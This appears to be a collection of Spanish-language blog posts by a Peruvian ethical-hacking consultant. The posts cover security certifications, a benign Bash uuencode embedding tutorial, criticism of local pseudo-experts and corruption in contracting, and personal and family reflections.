No voy a comentar detalles respecto al examen, solamente dire que pienso que ocurre lo mismo que en el CEH y todos los demas :
1. El criterio propio se debe quedar guardado durante el examen.
2. Si no se ha llevado el curso, hay que tener experiencia de campo y vigente.
3. El material de apoyo ayuda en forma minima porque al ser permitido solamente en forma impresa, se pierde mas tiempo buscando. Es mejor un buen block al lado y anotar el analisis o reflexiones.
Ya no sumare mas certificaciones de hacking, salvo que alguien me ofrezca US$10,000 mensuales, con 14 sueldos al año y beneficios adicionales. Ahi tal vez optaria por las de ISECOM o las de Mile2.
Me parece justo agradecer a SANS/GIAC y a Cesar Farro (el proctor/supervisor del examen) por haberme permitido dar el examen en forma gratuita (despues del contest que SANS/GIAC organizo para los CEH) y por haberme dedicado tiempo sin cobrarme un sol/dolar/euro/etc. durante la supervision de este examen, respectivamente.

Una Personal

2008-09-23T14:59:00.002-05:00

Me habia hecho el proposito de no postear cosas personales, pero, dejaria de ser un blog.
Hoy fallecio la madre de mi Amigo, compadre y colega Gustavo Vallejo.
La verdad, posteo porque no recuerdo haber sentido otro fallecimiento como este y el de Layka. Se que para aquellos que no me conocen el igualar el fallecimiento de la madre de Tavo con Layka sonara a cualquier cosa menos algo positivo. Los que me conocen, saben que Layka fue mi primera "hija" y la pase muy mal cuando nos dejo.
Pero, esta tristeza no es por la madre de Tavo como tal, a la cual conocia, admiraba y era imposible no apreciar y estimar porque era muy, pero, muy simpatica.
Esta tristeza es por no haber podido estar con Tavo en ese momento, ser el respaldo que todos necesitamos por mas que las situaciones nos hagan fuertes, abrazarlo y que sienta que estamos con el, abrazarlo como hizo con mi Mafi durante el terremoto del 15 de agosto del 2007 y a la que no solto sino hasta que todo paso.
Antes de escribir esto, recorde que Tavo estuvo conmigo cuando Layka se puso mal y hasta el final en una amanecida que siempre quisiera olvidar y nunca podre.
Life goes on...

GIAC Incident Handler no es lo mismo que un Ethical Hacker

2008-09-10T06:53:00.003-05:00

Más allá de quiénes ostentan esta certificación de GIAC/SANS o quienes venden cursos de manejo de incidentes como cursos de hacking, la palabra formal de Ed Skoudis, instructor/consultor de SANS y autor de los cursos 504 y 560, es :

What is the focus of SANS Security 560, and how does it differ from SANS Security 504?
SANS Security 560 deals with penetration testing and ethical hacking, in depth, covering numerous techniques for finding and exploiting flaws in a target environment using a consistent, high-quality testing regimen. SANS Security 504 focuses on incident handling, addressing practical methods for preparing for, detecting, and responding to computer attacks. In short, 560 covers penetration testing and ethical hacking, while 504 addresses incident handling.

Aren't the courses pretty much the same?
Not at all. 560 is very different from 504. We cover a variety of different tools in each class. Even when both classes cover the same topic or tool, they cover it from a completely different perspective. Take Metasploit and password attacks as examples. In 504, we talk about how these attacks work, emphasizing how to defend against them, and addressing how incident handlers can respond to their use. In 560, we get a lot deeper, talking about how to use each and every tool, with detailed, hands-on exercises that cover some of the features that incident handlers don't really need to know about but pen testers will likely use quite often. The idea is that incident handlers need to know what the attacks are from a broad perspective so that they can detect and respond to them in their environment. But, incident handlers don't need to know how to launch every one of the attacks we cover. Penetration testers, on the other hand, need to be able to use every tool we analyze, not just recognize its use against their environments. Thus, SANS 560 has triple the amount of hands-on exercises as 504, which itself includes numerous useful exercises tailored for incident handlers.

From a bottom-line perspective, 504 is more broad because incident handlers need to know about a lot of attack vectors that are typically not allowed for penetration testers by the rules of engagement. For example, incident handlers need to understand how to respond to bots and rootkits. But, the vast majority of penetration testers are prohibited from installing bots or rootkits on target machines. In the end, 560 is deeper, because penetration testers need hands-on experience with each tool, while 504 is more broad, because incident handlers need to focus on recognizing each tool's use in their environments.

Does 560 supersede 504 or supplant it?
No. 560 does not supersede 504. 504 is still a vital course, which we will continue to update and offer, supporting people in their careers as incident handlers. 560 is for penetration testers and ethical hackers.

I've already taken 504. Should I take 560 as a follow-on?
560 was designed as a perfect follow-on for people who have already taken 504 and are looking to get into more depth with tools used in professional penetration testing and ethical hacking. 560 is not recycled 504 material; it is an entirely new class with an entirely new set of slides and exercises.

I've taken neither 504 nor 560. Where should I start?
If you are more interested in incident handling, 504 is the course for you. If you need to develop your penetration testing skills, start with 560. Neither course is a pre-requisite for the other.

Por si no quedo claro, el curso SANS Security 504: Hacker Techniques, Exploits, and Incident Handling es post-mortem, el atacante ya se te metió y quieres aprender a lidiar con él/ella y que no se te vuelva a meter. El curso 560 Network Penetration Testing and Ethical Hacking es para aprender las técnicas y conocer las herramientas usadas por los atacantes más comúnes.

Habrá que esperar que alguno de los certificados locales GIAC/SANS se animen a tomar el challenge o llevar el curso para que lo puedan impartir acá.

Aprovecho el post para dar una estadística local, ya son 4 CEHs los que existen en nuestro querido Perú :
1. Ricardo Berrospi (SBS).
2. Eduardo Delgado (Deloitte).
3. Cesar Cuadra (Freelance, asociado a Open-Sec).
4. WCuestas (Open-Sec).

Alguien más ?

Codificando scripts en Bash

2008-06-17T23:17:00.006-05:00

Mi buen Amigo RenzoP me hizo una pregunta ahora que me motivo a postear esta explicacion de como imbuir un script, archivo, binario, etc. dentro de un script de Bash y luego utilizarlo.
Este metodo es utilizado para muchas labores, en el mundo en el que ando, la primera vez que lo vi fue con el instalado de Nessus de las versiones 2.X (aun existe en la 2.2.11) donde hay un script de autoinstalacion que tiene imbuido un tarball con el binario instalador de Nessus.
La forma sencilla es utilizando uuencode y uudecode. Los scripts a continuacion carecen de lineas de limpieza y estetica porque solamente tienen fines de explicacion.

1. Tenemos un script como :
cat radio.sh
#!/bin/bash
mplayer -wid 58723239 -slave -vo xv,sdl,x11 -ao alsa,oss,sdl,arts -framedrop -contrast 0 -brightness 0 -hue 0 -saturation 0 -cache 384 'http://s7.viastreaming.net:7320' -identify

2. Lo codificamos con uuencode :
uuencode radio.sh radio.decoded > radio.encoded

uuencode permite codificar archivos binarios para su transmision en formato ASCII por medio que solamente permiten este formato (pagina man)

radio.sh es el script del punto 1.
radio.decoded es el nombre que ira incluido dentro del archivo codificado que viene a continuacion de los permisos del archivo como se vera mas adelante y que sera usado para la decodificacion.
radio.encoded es el nombre del archivo codificado que se genera.

El contenido de radio.encoded es :

3. Finalmente, se imbuye (existe esa palabra ?) el script codificado dentro de otro que solamente hace la extraccion y ejecucion :

Esta codificacion es muy comun en lenguajes de scripting para distribuir programas binarios con autoinstaladores, para ocultar el contenido de scripts (la decodificacion se deriva a un directorio temporal y antes de concluir la ejecucion del script padre, se elimina el script decodificado del directorio temporal) y, de hecho, hay herramientas que no solo codifican sino encriptan y comprimen.

Charla de Ethical Hacking

2008-06-07T14:23:00.001-05:00

Esto es de hace unos meses, me pareció que es interesante porque no todos pueden asistir a estos eventos...

Posteando otra vez...

2008-05-29T11:27:00.003-05:00

No es que me sobre el tiempo ahora, pero, la verdad el trabajo absorve cada vez mas y el tiempo frente a las maquinas es para investigar, chatear, mailear, hacer propuestas, hacer informes y no queda tiempo para continuar con esta suerte de diario personal que son estos blogs.
Ademas, me puse el objetivo de hacer este blog relacionado unicamente a temas no familiares como ocurri con la version anterior en blog-city y por ello, probablemente era mas leido o porque posteaba mas y mas seguido....no lo se.
Aca algunas topicos recientes que valen la pena ser comentados :

Soy lector asiduo de algunos blogs como taosecurity.blogspot.com y un planeta como http://www.darknet.org.uk/. Recomiendo ambos porque ofrecen una buena forma de estar al tanto de opiniones expertas, maduras y mesuradas sobre seguridad de la informacion y seguridad informatica (en el caso de TaoSecurity) y sobre ultimas versiones de herramientas de hacking, forensia y noticias de ambos dos (en DarkNet).

Claro, aca va el punto picante : muchos entran a estos blogs, traducen los posts y luego los postean en sus blogs sin ningun reparo hacer aparecer todo como fruto de su investigacion o emanacion de genialidad.
Personalmente, he enviado correos con textos traducidos de TaoSecurity a personas que se les interesara y siempre indico la fuente.
Lo ultimo que vi robado de DarkNet fue un texto sobre metagoofil que fuera traducido y publicado en el blog de un consultor local de seguridad, mas un admin de seguridad que consultor, pero, asi se anuncia.

Ahi va un reto, aunque la verdad no creo que esta persona lea este blog : que aplique esa receta copiada al web de mi empresa y postee la informacion obtenida con metagoofil. Sencillamente, no obtendra algo sino modifica el script.

Un comentario reciente : Perú esta cambiando y pronto el tema de seguridad será importante y lucrativo, es decir, seguridad en tanto servicios. El espionaje industrial será una realidad. Importará ser el primero en exportar uva. No coloco el nombre de la persona que me lo dijo por asuntos de privacidad, es una persona muy conocida en medios de prensa y en verdad, me puso a pensar respecto a este tema y por ultimo, ojala que sea asi.
Schneier publico un articulo relacionado a las inversiones en seguridad y claro, me entere por TaoSecurity. Una parte interesante es la que refleja el comportamiento de las organizaciones que no se consideran importantes para ser atacadas o que creen que son invulnerables. Alli, Scheneier indica que se debaten entre el pequeño riesgo de una inversion en seguridad versus el alto riesgo de ser atacados y las consecuencias de ese ataque. Casi siempre, prefieren asumir la postura de eludir la toma de acciones y descartan el pequeño riesgo. (Nota: he colocado "pequeño riesgo" y "alto riesgo" adrede y no por mala traduccion para dar mayor realce a los calificativos del riesgo).
El nuevo tema en seguridad : PCI. Yo se que no es nuevo, pero, aca ya estan empezando a ponerle la punteria, por angas o por mangas, porque lo quieren o porque se los exigen.
Cada vez el tema de hacking se vuelve mas especializado, cada vez mas salen toneladas de herramientas y cada vez mas hay que dedicar tiempo a analizarlas, modificarlas, corregirlas, etc.

Sobre este punto tengo un debate interno muy personal : empezar a formar parte de los proyectos que desarrollan las herramientas ? Veo dificil que podamos tener tiempo para meternos en esa responsabilidad. Postear nuestras modificaciones o ampliaciones en algun sitio ? Podria tomarse como una actitud negativa ya que lo correcto seria aportar al desarrollo de las herramientas ? Mantener estas herramientas solo para nuestro team como hasta ahora ? Hey! No somos http://www.hackersforcharity.org/, pero, muchas veces conversamos largo y tendido sobre como el compartir conocimientos ayudaria a que la seguridad se maneje mejor en nuestro medio y hasta ahora solo cuando realizamos talleres de ethical hacking es que podemos hacerlo, aun asi, no es suficiente un taller.

Se acabo, me debo ir a bañar y salir a pelear por ganar mas clientes.....

PD: Alguien me posteo un comentario duro, breve y estupido. Sono a alguien dolido por mis criticas. Solo apruebo los comentarios que no son anonimos porque considero que la gente tiene que respaldar sus opiniones con su nombre, por eso mi blog no tiene un alias sino dice claramente : wcuestas.

Sobre certificaciones de Ethical Hacking y otras hierbas

2008-01-31T20:58:00.000-05:00

Hace mas de un mes respondi un mail a una lista de seguridad. Hace años que no participo de listas de interes escribiendo, solamente las leo, pero, como podran apreciar, si revisan el thread en los archivos de securityfocus.com, no solo en Perú se hablan sandeces.

Es obvio, como le decia a un amigo de esta lista, que yo he de defender la certificacion de CEH porque a pesar del tiempo transcurrido, seguimos siendo solamente 2 en Perú y no mas de 20 en Latino America.

Tambien es obvio que los demas defiendan las que tienen, pero, lo que nadie puede cambiar es el hecho que hasta hoy solamente existen 3 certificaciones que garantizan que los consultores sepan el comportamiento de un atacante versus el comportamiento de alguien dedicado a defender.

En este terreno caen todos los cursos y certificaciones que hacen analisis de intrusiones, osea, analisis post penetracion del atacante, y aquellos que se anuncian como incluir tecnicas de hacking y cuando se revisa el desarrollo del curso se trata solamente de enseñar el uso de algunas herramientas de evaluacion de seguridad informatica.

Dicho eso, me reafirmo en que los unicos cursos y certificaciones relacionadas a ethical hacking son los entregados por ISECOM, Mile2 y EC Council.

Como comentario local puedo mencionar que en el taller de ethical hacking realizamos en mi empresa han llegado varias personas que han llevado esos cursos de pseudo-hacking en otras microempresas o pseudo-empresas y descubren el mundo real de los atacantes. Igual, no los convierte ni en atacantes ni en ethical hackers porque solo el desarrollo tecnico y profesional es lo que permiten obtener dicha posicion.

Hay un curso que SANS esta por estrenar, mientras no lo estrene, no existe.

En lo personal, aprecio el desarrollo de las empresas peruanas, sin embargo, hay las que lo hacen por meritos propios y hay las que se llenan la boca de elogios a si mismos y se irrogan capacidades y sitiales que no tienen. Como propone Eric Raymond, al hacker de verdad se le reconoce como tal, el de mentira se autodenomina hacker.

Antes de ayer escuche otra cosa que me gusto tambien : los que saben como hacerlo, lo hacen y los que no, son instructores.

Saludos!

From: Walter Cuestas <wcuestas@gmail.com>
> > To: pen-test@securityfocus.com
> > Sent: Thursday, December 20, 2007 12:20:49 AM
> > Subject: Re: GCIA, GSEC, GCIH, CISSP, CEH ???
> >
> > Just to say that every comment about CEH seems to be based on
> > versiones previous to 5 (some comments seems based on books from EC
> > Council and 2 others that are so far from current EC Council
> > material).
> > Today, CEH is the start point and next steps for people who wants to
> > demonstrate their knowledge and expertise, thtrough certifications,
> > are ECSA and finally get LPT (if you need this one).
> >
> > Since the first mail of this thread, I have reviewed every syllabus,
> > exam topics, exam and labs demos, training videos and so on.
> >
> > IMHO, there are just three sources for pen test related certifications
> > : EC Council, ISECOM and Mile2 (based on CEH).
> >
> > SANS has a lot of certifications that are good complement for CEH,
> > OPST, OPSA, CPTS and CPTE, but, I can't find an specific pen test
> > certification from SANS.
> >
> > Also, as all of you know, there is no certification neither a set of
> > exams that really demonstrate the actual knowledge of people.
> > These certifications are just a complement for a professional career.
> >
> > BTW, I have reviewed some of the recommended training based on videos
> > and they seem to be just BackTrack courses.
> >
> >
> > >
> > > Regards,

Primer post del 2007 : DE TODO !!!

2008-01-02T02:09:00.000-05:00

Normalmente escribo al final del año, pero, ahora me dedique mas a cumplir un objetivo de limpieza en mi casa y pasar tiempo con los mios que con la chamba y cosas asi, buen, un balance en verdad.
Entonces, no puedo evitar tocar algunos puntos del año pasado :
1.Me mude para aca. Mi viejo y querido blog-city decidio empezar a cobrar por los blog y con ellos me corri para esta suerte de conjunto habitacional de los blogs. Si alguien esta interesado en mis posts en blog-city, los he puesto en HTML y comprimido, los pueden descargar desde este URL.
2. Familia : fue un año muy duro. De hecho la situacion economica planteo situaciones dificiles, pero, mas alla de eso, mantener un matrimonio tantos años con personas tan "peculiares" como nosotros, es un reto complejo y bien dificil de evitar que los hijos sean participes y se vean muy afectados.
A esto puedo sumar la nueva experiencia de una hija adolescente en un medio educativo con un sin fin de taras y fallas "voluntarias" que afectan a una joven a pesar de su capacidad intelectual y formacion humana.
Me queda la certeza de saber que estamos haciendo lo correcto, de estar convencido que mis 3 hijos tienen un talento sin fin, una bondad sin limites, una belleza sin par y que asumen retos y los cumplen con exito :
Mafi encabeza este año la lista no solo por las calificaciones del colegio sino por un comportamiento destacado en cada cosa que ha hecho, sea intelectual, cultural, social y fisica. No importa lo que sea, ella lo hace bien. Tal vez su logro mas destacado fue el segundo puesto en el concurso de Ingles del colegio y seguir siendo la mas elocuente de los Cuestas-Zegarra.
Sigue Scarlett, la adolescente que debio sumar, por un error mio, la "adolescencia molinarina" a su vida, pero, que con la ayuda de personas interesadas en la formacion de nuestros hijos, consiguio superar sus temores y alcanzar posiciones de exito. Ella tenia miedo a las Matematicas, termino de finalista en el concurso del colegio, gracias al apoyo de su profesor y la gente en la casa. Sigue siendo la mas loca y lider de sus hermanos.
Dejo al final al chato Aarom adrede, porque primero son las mujeres y porque es el engreido de todos :) El chato es hablador (con propiedad y estilo geneticamente heredado), galan (no hay mujer que se le resista), habil (cuando quiere, hace unos golazos), inteligente (sus calificaciones y capacidad de concentracion lo demuestran), tragon (dejaria de ser Cuestas Zegarra si no fuera tragon) y buen hombre. Su mayor logro : cinturon blanco-punta amarilla en 9no KUP de Tae Kwon Do.
De mi esposa no pongo nada porque en su vida "internet" yo no existo, ella si existe en la mia, pero, no le dare mas espacio que este parrafo.
Mi familia tambien esta compuesta por mi madre, mujer sumamente complicada, pero, es mi madre, y mi abuela, a la cual considero debo mucho y cuya enfermedad nos ha complicado mucho a todos.
Este año mi familia tuvo la enorme suerte de estar siempre junta, unida y fuerte ante cada acontecimiento negativo, de esos que el 2007 trajo a montones, como el terremoto de Agosto donde estabamos todos juntos e incluso mi madre llego a los pocos minutos.
3. Amigos : ha sido un año muy peculiar en este sentido porque sufri varias decepciones, imagino que yo tambien decepcione.
Este año no puedo calificar como otros al "Amigo del Año", quien estuvo mas cercano a mi y me hace muy feliz, es mi hijo, asi que tocaria decir que tuve 3 Mejores Amigos en el 2007 : Aarom, Scarlett y Mafi.
Si quiero mencionar a varios Amigos : VLemos, sencillamente, amigo incondicional; GVallejo, me demostro el dia del terremoto que no me equivoque al hacerlo padrino de Mafi, no la solto para nada, es raro, pero, lo acepto como es; RCastelo, ha vivido momentos muy dificiles y creo que eso ha hecho que seamos mas amigos.
Los que me decepcionaron fueron 2, al menos son los que me dejaron mas dañado, mejor no los menciono.
4. Profesional : el 2007 no fue destacado por alguna certificacion, de hecho, no obtuve una tan importante como el CEH que aun sigue siendo LA certificacion en Ethical Hacking, pero, si creo que aprendi mucho, desarrolle muchas habilidades, comparti lo que aprendi, entregue buenos resultados a los clientes y gane experiencias valiosisimas.
5. Agradecimientos : aunque esto no es como el Oscar, si creo que debo agradecer a muchas personas por su apoyo, sus opiniones, su interes, su compañia, por creer en mi : PTrejos, CRenzo, RPortocarrero,JMunoz, ATello, BColom, FNeira, MGalvez, MUrizar, MMunoz, MLazaro, YSuarez, VPazce, FTrujillo y claro, Alicia Cuestas Zegarra que a pesar de renegar, siempre esta alli apoyandome.
6. Open-Sec (o el trabajo en si) : que duro es hacer empresa en Perú, si, duro y dificil, como he visto el 2007 en general, con logros y mayor presencia, con nuevos proyectos y retos, pero, con mas problemas relacionados al medio peruano que cualquier otra cosa.
Este año me sirvio para confirmar una vez mas que la coima esta afincada en nuestras organizaciones sin importar si son estatales o privadas. Esto es, si una organizacion es coimera, lo seguira siendo y digo "organizacion" porque existen verdaderas mafias al respecto.
Le interesa a alguien ? No, de hecho hemos tenido experiencias multiples de este tipo : empresas que ponen cualquier documento para ganar un concurso y dicho documento no es revisado complacientemente y de acuerdo a los intere$e$ del negocio, empresas que ponen a personas que no estan en su staff o personas que finalmente no ejecutan los proyectos, empresas cuyo personal tiene su empresa para "cachuelos" y hacen que los contraten para labores criticas en forma indirecta y hasta montan un circo de concurso publico, empresas que piden servicios importantes a empresas importantes, pero, que cierran trato con quien acepta coimear, etc, etc, etc, etc.
Este año decidimos terminar de aceptar subcontrataciones porque son la instititucionalizacion del "perro muerto" o "te pago cuando me de la gana".
Obtuvimos excelentes clientes, siendo el mejor uno de los bancos mas grandes en Perú; iniciamos dando servicios de computacion forense; seguimos siendo el mejor equipo de ethical hacking de Perú y si se nos escapo algun negocio al respecto, fue por competencia, leal o desleal (la de las coimas y arreglos previos).
La competencia leal nos da duro por nuestra carencia de capacidad en ventas, algo que parece ser nuestro karma.
El tema de Linux se enfoco en VoIP y con ello definimos una nueva meta para el 2008.
Open-Sec se consolida como empresa, mas alla del exito en el mercado, entra en una etapa de estabilidad que hacia el 2009 debe determinar un crecimiento bien importante.
7. Ranking :
La mejor familia del 2007 : Los Cuestas-Zegarra
Los mejores hijos del 2007 : Scarlett (aka kireitor), Mafalda (aka mafitac), Aarom (aka el chato)
Las mejores mujeres del 2007 : Las de mi casa : Esposa, Madre, Abuela.
El exito laboral del 2007 : el proyecto realizado para el BCP.
El mejor proyecto Linux del 2007: SuSE y GW en el BBVA.
El evento del 2007 : Open-Sec Day 2007.
Los peores errores del 2007 : trabajar para el PJ, MINEDU e I-Sec. Eso nos demostro que ni la excelente calidad de nuestro trabajo hace que las personas necias se comporten en forma reciproca.
Lo peor del 2007 : la sensacion y casi conviccion que Alan Garcia dejara nuestro pais peor que en su primer mandato.
Los mayores momentos de orgullo : cuando MafitaC saco el segundo puesto en el concurso de Ingles, cuando Scarlett paso a la final del concurso de Matematica, cuando Aarom obtuvo su cinturon blanco de punta amarilla.
La distro del 2007 : OpenSUSE de lejos!

Y que hay para el 2008 ? Mucho mas !
1. Familia : cambio de colegio de Scarlett, seguir mas pegado a mis hijos, quiero ser su padre y mejor Amigo, mas empeño en mantener el matrimonio, mas paciencia con mi madre, tranquilidad para mi abuela, mas tiempo FELIZ.
2. Profesional : este año debo obtener 2 certificaciones : una de SANS sobre hacking o el CLP y la otra es la de dCAP.
3. Open-Sec : wow! Mulitples retos : hacer dinero con VoIP como partner de Digium en Perú y Ecuador, basta de soporte comunitario ineficiente o de alianzas con empresas extranjeras que hablan mucho y hacen poco; seguir haciendo negocios en base a seguridad informatica, ethical hacking a fondo; realizar inversiones rentables en Perú y Ecuador; certificar mas a nuestro personal; nuevo local; nuevos consultores, tecnicos y vendedor; mantener clientes como el banco y crecer con ellos y en base a ellos.
4. Mensajes aparte :
- Acabemos con los "pirañas de cabina" y "hackers de blog".
- Hagamos del negocio VoIP basado en Linux algo serio.
- Demuestrame que Trixbox es mas limitado que un Asterisk.
- Compartamos el conocimiento.

Espero que todos los buenos deseos de las personas se cumplan este año.

Bienvenido 2008!!!

Hacking o un simple juego ?

2007-10-21T21:54:00.000-05:00

Aunque puede parecer una version mas de Empresas de Seguridad y Linux, no lo es, pero, de alguna forma se relaciona.
Hace unas semanas aperture un canal IRC donde lo mas resaltante fueron unos ingresos de un norte americano (US citizen), un "cracker" y unas buenas conversaciones con un joven arequipeño. A la fecha, nadie ingresa.
El objetivo del canal era compartir conocimientos sobre hacking entre peruanos, la idea era generar un foro en linea de consultas y respuestas. Algunos propusieron desde dar charlas hasta realizar eventos, pero, nadie se comprometia.
Nadie preguntaba, todos sabian de todo, aparentemente. Al principio ingresaron unos cuantos conocidos locales y luego ya no habian conversaciones de interes para ellos o mas bien, no habian conversaciones.
Todo eso me dejo la duda sobre que pasa al respecto en nuestro pais donde hay una gran cantidad de gente que se autodenominan hackers o que impresionan a algunos con una que otra herramienta y, literalmente, los empiezan a alucinar como los super hackers.
Es decir, si existen hackers, no cumplen el principio basico de compartir el conocimiento o no los hay en realidad o la "idiosincracia peruana" les impide compartir o preguntar o ....?
Yo me quede sin respuesta y se que no la tendre porque este mundo del hacking (entiendase hacking orientado a seguridad) esta compuesto por un 70% de habladores y eso se refleja en nuestra sociedad informatica donde un traductor de programas, mantenedor de paquetes y de uno que otro juego intracentente es visto como un hacker.
De lo unico que puedo quedarme tranquilo es que la gente que trabaja conmigo si mantiene el espiritu, ganas y afan de aprender, preguntar, compartir y enseñar lo poco (o mucho?) que sabemos.
Uno de nuestros consultores ya se sumo a las certificaciones de forensia que tenemos (ya somos 3), otro anda investigando nuevos frameworks (w3af, inguma), seguimos formando gente en openSUSE y el proximo mes iniciamos una nueva campaña de concientizacion, esta vez, sobre Hacking VoIP.
La semana pasada estuve como invitado de ultimo momento en un congreso sobre sistemas e informatica de una prestigiosa universidad en Arequipa. Siempre me emociona ir para alla por las raices mias y de mi esposa, tanto como cuando vamos a Trujillo. De cerca de 12 expositores principales, apenas 4 eramos peruanos, 2 de ellos porque laboran para uno de los auspiciadores, 1 porque es local y 1 de casi paracaidista (yo). Esta buenisimo recibir gente de otros paises, pero, me gustaria ver que el ratio de invitaciones reciprocas a peruanos fuese el mismo, sin embargo, no pasa.
Esperemos que todo cambie para mejor, hay mucho joven capaz en nuestro pais que merece salir adelante y ser reconocido.

QUICKLY : Pseudo hackers, pseudo pruebas de penetración, pseudo expertos

2007-09-25T18:35:00.000-05:00

En general, siempre doy la bienvenida a la competencia, incluso, tengo afan de compartir conocimientos y aprender, por eso aperture el canal #hackingperu en irc.freenode.net.
Pero, hoy vi un brochure una empresa que muchos sabemos no es tal, es mas bien, el cachuelo de un excelente tipo y excelente profesional de Seguridad.
Lo gracioso de su brochure es que indica :
"Emisión de certificado de “sistema o red segura”, si pasa airosamente todas las pruebas de seguridad." Wow! Que autoridad tienen para dar un certificado de este tipo?!! No tiene a nadie certificado en Ethical Hacking ni menos indican usar alguna metodologia reconocida en dichas lides.
Mas adelante hay otra parte jocosa : "Nuestros expertos comentan:.....En nuestra trayectoria, como especialistas de seguridad, hemos visto a más de una empresa de tecnología sorprender, incluso, a entidades financieras, con reportes de intrusión imprecisos, que fueron generados por herramientas comerciales de escaneo de vulnerabilidad, haciendo creer que lo ofrecido era un “hacking ético”. Antes de ser sorprendido, contáctenos." PERO, mas adelante indican "...empleando (sólo) donde fuera necesario las más famosas herramientas de escrutinio de vulnerabilidades de sistemas, entre ellas Nessus, Metasploit, Nikto, WebScarab y otras más de índole experto." Aca si les fallo la redaccion porque :
1. Que me digan como pueden cumplir en tiempos adecuados sin usar PRIMERO herramientas como las mencionadas.
2. Cuales de esas no son automatizadas ?! Osea, las "malas" son las comerciales y como estas no lo son, son las "buenas" ?
3. Nadie que labore en estos temas considera a Nikto usable hoy en dia y Metasploit es un framework para analisis de exploits, no para evaluar !!!

Naaaaaaaaa, un pobre brochure para alguien tan bueno como el dueño de esa empresa...!!!

Dos sismos : ambos con buenas consecuencias para los mios.

2007-08-16T10:30:00.001-05:00

Ayer se produjeron dos sismos para mi gente, mi familia y los de mi empresa. Por suerte, las consecuencias de ambos fueron buenas para los mios. Lamento muchisimo lo que esta pasando en Ica porque veo como han sufrido muchas familias y lo comparo con la mia, tuvimos la suerte de estar juntos y que no nos pase nada malo.
De que trato el primer sismo ? Porque el otro fue un tremendo terremoto que no tengo ni para que comentar.
El primer sismo fue sentido por MSN, me contacto un amigo periodista a contarme que le habian hablado negativamente sobre nuestro trabajo. Es decir, que nuestra labor en un cliente MUY GRANDE habia sido mala, PERO, que se destabacan nuestro excelente nivel tecnico.
Toco este tema en mi blog porque esto es solo un comentario y porque no he visto ninguna empresa que coloque cosas asi en sus web corporativos, es mas, nadie reconoce estos temas o se hacen los locos.
En nuestro caso hay varias explicaciones al tema con consecuencias concretas y todas buenas :

1. Nos toco hacer un trabajo tercerizado. Como cualquier empresa que inicia, es dificil llegar directamente a los clientes finales y por ello empresas mas grandes y que tienen capacidad comercial, pero, no tienen personal propio, contrata empresas pequeñas como Open-Sec que si tienen los conocimientos y experiencia requeridos.
De hecho, la labor en mencion fue vendida por una empresa I que contrato a una empresa I- que contrato a Open-Sec. Facilmente, se puede entender que se producen problemas de "telefono malogrado" y complacencias que todos esperan que el mas pequeño asuma y lo que es peor, el mas pequeño no tiene voto para acotar el alcance y cobertura que los mas grandes se afanan en ampliar para vender "mejor" al cliente su imagen. Como siempre digo, el cliente quiere pan con asado por "media luca" (medio Nuevo Sol) y ellos se lo dan exigiendo al ultimo en el stack por esa misma media luca.
Luego, vienen otros problemas: te pago cuando me paguen, te pago cuando tenga plata, te pago sin factura, etc.
Determinacion : ese fue el ultimo trabajo tercerizado que aceptamos. Desde que terminamos esa labor, decidimos no aceptar mas proyectos por intermediarios sino solamente clientes finales.

2. No existen propuestas serias ni un control de proyecto adecuado. Es conocido que los vendedores venden muchas veces vaporware y los tecnicos tenemos que cargar esa cruz, pero, hay extremos.
Sin embargo, el problema no queda en los vendedores de los proveedores, aun se ve en clientes grandes gente con mala actitud y aptitud y que a pesar de ser entidades privadas, quieren que una evaluacion de seguridad entregue los resultados que ellos quieren o les conviene. Peor es que los intermediarios exigen que el real proveedor entregue los servicios como el cliente quiere en forma y fondo.
En estas situaciones, ni los intermediarios ni el cliente entiende ni quiere entender que un proyecto debe ser gestionado adecuadamente y lanzan al piso los gantt, los objetivos, alcance y cobertura.
Determinacion : Seguir esparciendo el mensaje que cualquier labor de un proyecto debe ser tomada con seriedad y si no se tiene el conocimiento adecuado, reconocerlo y adquirirlo.

3. Una cosa es ser tecnico y otra consultor. Nuestra gente tiene una gran capacidad como tecnicos, son los mejores. De hecho, hemos realizado desde el año pasado el 80% de los servicios de ethical hacking en nuestro pais y este año incursionamos en analisis forense con exito. Seguimos contando con el unico CEH en Perú que labora en un proveedor, una persona mas se certitificara este año como CEH y yo ire por el CHFI.
Un consultor, por otro lado, debe tener la capacidad de comprender los requerimientos del cliente, analizarlos, plantear soluciones, revisarlas y adecuarlas con el cliente Y REDACTAR BUENOS ENTREGABLES. Esto ultimo quiere decir : buena ortografia y buena redaccion. (En mi blog y correos no uso acentos).
Determinacion : En Open-Sec solo se aceptaran trabajos de CONSULTORES y solamente son considerados buenos y completos si cuentan con una ortografia y redaccion CORRECTAS. No hay puntos intermedios.

4. No todos los clientes grandes son iguales ni todas las areas en un cliente son iguales.
La labor que genera este post no ha sido la mas grande que hemos realizado, de hecho, ha sido una de las mas pequeñas, pero, bien puntual y particular. Algo que no siempre solicitan los clientes, pero, algo para lo cual estamos preparados y que ya hicimos en dos oportunidades.
En ese mismo cliente, hemos trabajado en el pasado con su area de Seguridad de la Informacion en temas de tecnologia y nos ha ido muy bien, de hecho, los tomamos como referencia. Pero, la calidad y conocimientos no se transmiten por osmosis y ahora nos toco otra area que cuenta con personal profesional, pero, sin experiencia en temas de seguridad.
Determinacion : Cuando volvamos a tener un proyecto con una organizacion grande, incluiremos un entrenamiento previo de 8 horas respecto a las labores que desarrollaremos. Es mejor enseñarles y que comprendan a tener que explicarles cuanto es 2 mas 2.

5. Si se pide comprobar como un atacante puede afectar a la organizacion, no se debe exigir un comportamiento de tecnico de biblioteca.
Como le comente a mi esposa : imagina que pides evaluar la inseguridad del acceso a nuestro departamento, vivimos en un segundo piso donde hay 2 puertas y una ventana y le dices al "evaluador" : prueba si somos vulnerables, PERO, solo desde la puerta principal.
Ah! Pero, tambien, hazlo entre 10 am y 2 pm que siempre habra alguien en casa que lo detecte.
Absurdo total! Pero, eso es lo que los vendedores aceptan de los clientes y no podemos comprender las razones de ambos.
Determinacion : Si nueveamente nos piden hacer algo asi, no lo hacemos y se analizara la continuidad del proyecto. Esto es ETHICAL HACKING no un servicio de tallado a mano.

La historia aun no termina, no terminan de pagarnos por un servicio que el cliente ya recibio y dio su conformidad y lo que es peor, no tenemos ni siquiera una fecha de pago que depende de la buena voluntad de los intermediarios.

Como dijimos ayer :
A. Unas son de cal y otras de arena. El punto 3 atañe al 100% a Open-Sec.
B. Cuando el rio suena, es porque alguien esta tirando piedras. (Gustavo Vallejo)
C. Somos excelentes tecnicos (ethical hackers) y buenos consultores (no excelentes).

Saludos!

Migrando...

2007-08-12T19:27:00.001-05:00

Hace unas semanas recibi un mail de blog-city.com indicando que solamente hasta diciembre será un servicio gratuito.
